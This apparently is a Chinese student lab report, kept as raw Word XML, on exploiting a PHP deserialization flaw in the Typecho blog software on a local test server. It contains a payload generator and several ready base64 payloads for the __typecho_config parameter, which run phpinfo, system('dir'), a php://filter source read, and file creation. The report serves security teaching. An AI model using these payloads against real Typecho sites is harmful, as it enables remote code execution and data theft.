        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>$exp = array(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    'adapter' =&gt; new Typecho_Feed()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>echo base64_encode(serialize($exp));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>代码中用到了PHP的assert()函数，如果该函数的参数是字符串，那么该字符串会被assert()当做PHP代码执行。phpinfo();便是我们执行的PHP代码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上述代码中用到了 PHP 的 assert() 函数，如果该函数的参数是字符串，那么该字符串会被assert()当做 PHP 代码执行，这一点和 PHP 一句话木马常用的 eval() 函数有相似之处。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color w:val="000000"/>
          <w:highlight w:val="yellow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phpinfo(); 便是我们执行的 PHP 代码，如果想要执行系统命令，将 phpinfo(); 替换为system(‘ls’); 即可，注意最后有一个分号。访问 exp.php 便可以获得 payload ，通过 get请求的方式传递给 typecho.php 后， phpinfo()成功执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3702050"/>
            <wp:effectExtent l="0" t="0" r="139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Cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>访问php网页方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="17329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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="732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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/exp.php" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://127.0.0.1/exp.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE0OiJzeXN0ZW0ooa5sc6GvKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="9150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Cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>访问typ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>的过程中遇到如下问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="21380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这是PHP 的提示而非报错，这里我未给$user赋予值,就把它输出,所以报错了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>以下是关闭P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>HP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>提醒的方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="36963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</w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="15855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Cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>再通过get请求的方式传递给typecho.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>27.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>typecho.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>?__typecho_config=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE0OiJzeXN0ZW0ooa5sc6GvKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>成功执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4251960" cy="32004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color w:val="000000"/>
        </w:rPr>
        <w:t>要执行系统命令，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">测试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system(”dir”)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520440" cy="64008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查看页面 payload: YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjE0OiJzeXN0ZW0oImRpciIpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo1OiJhc3NlciI7fX19fX0=</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4358640" cy="982980"/>
            <wp:effectExtent l="0" t="0" r="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FandolSong-Regular-Identity-H" w:hAnsi="FandolSong-Regular-Identity-H" w:eastAsia="FandolSong-Regular-Identity-H" w:cs="FandolSong-Regular-Identity-H"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>测试本地文件包含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716780" cy="868680"/>
            <wp:effectExtent l="0" t="0" r="762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payload: YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVj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aG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3Qi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OjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5O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YW1lIjtzOjY5OiJpbmNsdWRlICJwaHA6Ly9maWx0ZXIvcmVhZD1jb252ZXJ0LmJhc2U2NC1l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bmNvZGUvcmVzb3VyY2U9aW5kZXgucGhwIjsiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9m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aWx0ZXIiO2E6MTp7aTowO3M6NToiYXNzZXIiO319fX19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页面如下：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312920" cy="65532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base64 解密看结果，是我们 www 目录下的 index 源码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168140" cy="937260"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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Cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5941060" cy="2286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510" cy="228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Cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="16935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将 phpinfo(); 替换为 fopen(\'newfile.txt\', \'w\'); 我们把exe.php文件中代码句 $this-&gt;_params['screenName'] = 'phpinfo()'; 中的 phpinfo() 替换为 fopen(\'newfile.txt\', \'w\'); ，即实现在exe.php目录下产生一个名为 newfile.txt 的文本文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>我们通过重复的操作，来提取到这个新命令的 payload 如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>这里有斜杠反斜杠会报错，因此删掉了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 xml:space="preserve">我们通过重复的操作，来提取到这个新命令的 </w:t>
      </w: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payload </w:t>
      </w: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 xml:space="preserve">如下：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YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZAB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pdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1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JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjI2OiJmb3BlbignbmV3ZmlsZS50eHQnL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CAndycpOyI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319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fX19 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs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>然后同样通过GET请求方式把其传入到typecho.php文件，打开浏览器输入URL，回车运行发现无报错， 证明运行成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4638675" cy="7810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Cs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>然后我们去目录：C:\PHPnow-1.5.6\htdocs下观察，发现确实产生了一个newfile.txt文本文件，证明命令执行成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3721735"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1206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 xml:space="preserve">我们为了实现该命令的运行，对typecho.php文件中的 </w:t>
      </w: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Typecho_Feed </w:t>
      </w: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 xml:space="preserve">类做了一定的修改，确保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7"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString() </w:t>
      </w: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>方法能够返回一个字符串。修改后如下：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class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Typecho_Feed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352" w:firstLineChars="20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private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$item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firstLine="352" w:firstLineChars="20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public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__toString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ind w:left="701" w:leftChars="166" w:hanging="352" w:hangingChars="20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isset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$this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-&gt;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'author'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])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&amp;&amp;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isset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$this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-&gt;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'author'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]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- &gt;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screenName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)) { </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="880" w:firstLineChars="50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$this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-&gt;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'author'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]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-&gt;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screenName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firstLine="704" w:firstLineChars="40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else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1056" w:firstLineChars="6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''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ind w:firstLine="1408" w:firstLineChars="80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704" w:firstLineChars="40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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b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firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:bCs/>
        </w:rPr>
        <w:t>通过本次实验，我结合书上老师给出的实例，理解了反序列化产生的原理，并且学习了 如何对其进行利用。了解了 PHP 反序列化漏洞的原理，同时学习了如何编写 PHP 反序列化漏 洞的代码，并且实现了其他的系统命令，创建文件夹、文本文档等。通过自己进行实验，提 高了动手能力，同时也提高了漏洞挖掘的能力，增强了安全防范意识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对于 web 应用的代码审计更加熟悉，有了自主搜寻漏洞的能力，也明白了如何利用魔法函数进行恶意攻击与防护。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/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andolSong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MRoman10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0-Bold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dolSong-Bold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Roman12-Bold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hiNzU1Njg1YmIxNzRlYjdmZDAyODZhMjg1ZmFjNjUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="001F1E13"/>
    <w:rsid w:val="0000472F"/>
    <w:rsid w:val="00015EEE"/>
    <w:rsid w:val="00040B94"/>
    <w:rsid w:val="000C408B"/>
    <w:rsid w:val="000F4AD6"/>
    <w:rsid w:val="00114A1E"/>
    <w:rsid w:val="0014185C"/>
    <w:rsid w:val="00184C47"/>
    <w:rsid w:val="001D79EA"/>
    <w:rsid w:val="001E3B53"/>
    <w:rsid w:val="001F1E13"/>
    <w:rsid w:val="002714F9"/>
    <w:rsid w:val="002A454C"/>
    <w:rsid w:val="00306243"/>
    <w:rsid w:val="003244BB"/>
    <w:rsid w:val="00384189"/>
    <w:rsid w:val="003A2E8B"/>
    <w:rsid w:val="00434105"/>
    <w:rsid w:val="00462448"/>
    <w:rsid w:val="004679E8"/>
    <w:rsid w:val="0048598B"/>
    <w:rsid w:val="004A0690"/>
    <w:rsid w:val="004A5913"/>
    <w:rsid w:val="004D6E70"/>
    <w:rsid w:val="00503458"/>
    <w:rsid w:val="0051155E"/>
    <w:rsid w:val="00592A31"/>
    <w:rsid w:val="005F1DF7"/>
    <w:rsid w:val="006B7D89"/>
    <w:rsid w:val="006C533A"/>
    <w:rsid w:val="006D08DA"/>
    <w:rsid w:val="006E6EE3"/>
    <w:rsid w:val="006F4968"/>
    <w:rsid w:val="00710154"/>
    <w:rsid w:val="007A0E88"/>
    <w:rsid w:val="007D4956"/>
    <w:rsid w:val="00802547"/>
    <w:rsid w:val="00815B53"/>
    <w:rsid w:val="00824F95"/>
    <w:rsid w:val="008C5266"/>
    <w:rsid w:val="008E7914"/>
    <w:rsid w:val="008F14E2"/>
    <w:rsid w:val="00923F1D"/>
    <w:rsid w:val="00933025"/>
    <w:rsid w:val="00977C59"/>
    <w:rsid w:val="00A25AE0"/>
    <w:rsid w:val="00A4502A"/>
    <w:rsid w:val="00AA46FE"/>
    <w:rsid w:val="00AC08C2"/>
    <w:rsid w:val="00AE2459"/>
    <w:rsid w:val="00AF5C34"/>
    <w:rsid w:val="00BD1E82"/>
    <w:rsid w:val="00BE32CE"/>
    <w:rsid w:val="00BE5C2F"/>
    <w:rsid w:val="00C00282"/>
    <w:rsid w:val="00C25AC6"/>
    <w:rsid w:val="00C4376E"/>
    <w:rsid w:val="00C441F7"/>
    <w:rsid w:val="00C64180"/>
    <w:rsid w:val="00CC68CC"/>
    <w:rsid w:val="00CD3DC4"/>
    <w:rsid w:val="00CE5048"/>
    <w:rsid w:val="00D0421B"/>
    <w:rsid w:val="00D120EC"/>
    <w:rsid w:val="00D83D91"/>
    <w:rsid w:val="00D9204E"/>
    <w:rsid w:val="00DA21BF"/>
    <w:rsid w:val="00DA508C"/>
    <w:rsid w:val="00DB6210"/>
    <w:rsid w:val="00E31A60"/>
    <w:rsid w:val="00E464E4"/>
    <w:rsid w:val="00E7659E"/>
    <w:rsid w:val="00E77465"/>
    <w:rsid w:val="00EC2CC3"/>
    <w:rsid w:val="00ED0C0F"/>
    <w:rsid w:val="00EF2FE1"/>
    <w:rsid w:val="00F37703"/>
    <w:rsid w:val="00F86993"/>
    <w:rsid w:val="00FA6B4E"/>
    <w:rsid w:val="00FF1E61"/>
    <w:rsid w:val="03D135AB"/>
    <w:rsid w:val="07C314B8"/>
    <w:rsid w:val="0C30047D"/>
    <w:rsid w:val="106A6B29"/>
    <w:rsid w:val="11194B1F"/>
    <w:rsid w:val="146E2C2E"/>
    <w:rsid w:val="14ED0401"/>
    <w:rsid w:val="17B56695"/>
    <w:rsid w:val="187078E0"/>
    <w:rsid w:val="190725E0"/>
    <w:rsid w:val="1BC677FA"/>
    <w:rsid w:val="1F77749F"/>
    <w:rsid w:val="230A4227"/>
    <w:rsid w:val="23B73045"/>
    <w:rsid w:val="294074A5"/>
    <w:rsid w:val="29811DA0"/>
    <w:rsid w:val="303C4F85"/>
    <w:rsid w:val="306D73EE"/>
    <w:rsid w:val="36681122"/>
    <w:rsid w:val="387E26CC"/>
    <w:rsid w:val="3D7E6576"/>
    <w:rsid w:val="40CA31B5"/>
    <w:rsid w:val="4198283E"/>
    <w:rsid w:val="42D82628"/>
    <w:rsid w:val="44D83F49"/>
    <w:rsid w:val="4C1F57EC"/>
    <w:rsid w:val="4C4D45ED"/>
    <w:rsid w:val="4CE77A4B"/>
    <w:rsid w:val="4D425B8B"/>
    <w:rsid w:val="4ED621E6"/>
    <w:rsid w:val="53FE0168"/>
    <w:rsid w:val="555D0793"/>
    <w:rsid w:val="561D204F"/>
    <w:rsid w:val="58B50638"/>
    <w:rsid w:val="5AA01DD0"/>
    <w:rsid w:val="5B07056A"/>
    <w:rsid w:val="5F6700CF"/>
    <w:rsid w:val="62B2437A"/>
    <w:rsid w:val="641F2526"/>
    <w:rsid w:val="65346E3C"/>
    <w:rsid w:val="661F1BA3"/>
    <w:rsid w:val="6B6A619E"/>
    <w:rsid w:val="6BB61FDD"/>
    <w:rsid w:val="6D174C4E"/>
    <w:rsid w:val="6F051C81"/>
    <w:rsid w:val="747A2042"/>
    <w:rsid w:val="754F6652"/>
    <w:rsid w:val="773D0937"/>
    <w:rsid w:val="7B8E06A1"/>
    <w:rsid w:val="7C6C3443"/>
    <w:rsid w:val="7CA7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10</Pages>
  <Words>1951</Words>
  <Characters>5893</Characters>
  <Lines>28</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6651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86151</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-09T11:34:47Z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3DCC0EF9F70A46309581E2A52ABA8232_13</vt:lpwstr>
  </property>
</Properties>
</file>